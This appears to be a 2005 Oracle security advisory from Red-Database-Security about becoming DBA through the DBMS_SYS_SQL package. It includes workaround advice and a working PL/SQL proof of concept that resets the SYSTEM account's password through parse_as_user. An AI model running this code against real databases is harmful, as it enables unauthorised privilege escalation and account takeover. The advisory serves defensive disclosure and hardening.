Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Become DBA via Oracle DBMS_SYS_SQL in Oracle 8i / 9i / 10g

Name	Become DBA via Oracle DBMS_SYS_SQL in Oracle 8i / 9i / 10g
Systems Affected	Oracle 8i / 9i / 10g
Severity	Low Risk
Category	Become DBA
Vendor URL	http://www.oracle.com/
Credit	Metalink Note:272381.1
Exploit	http://metalink.oracle.com
Date	02 May 2005 (V 1.00)

Details

The following test case is from Oracle itself. A test case is nothing else than an exploit or proof of concept code. This test case allows to become DBA if the permission on DBMS_SYS_SQL are granted . By default only XDB has execute permission. Sometimes PORTAL30, PORTAL30_SSO and OAS_PUBLIC has also execute permission on DBMS_SYS_SQL.

Metalink note 112271.1 gives the following advice:

grant execute privileges on DBMS_SYS_SQL to the (default user) OAS_PUBLIC.

BE CAREFUL DOING THIS...

Workarounds
Never grant DBMS_SYS_SQL to public;

Example
declare
uid number;
sqltext varchar2(100) := 'alter user system identified by hacker';
myint integer;

begin
select user_id into uid from all_users where username like 'SYSTEM';

myint:=sys.dbms_sys_sql.open_cursor();
sys.dbms_sys_sql.parse_as_user(myint,sqltext,dbms_sql.native,UID);

sys.dbms_sys_sql.close_cursor(myint);
end ;
/

Patch Information
No patch required. Never grant DBMS_SYS_SQL to public.

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.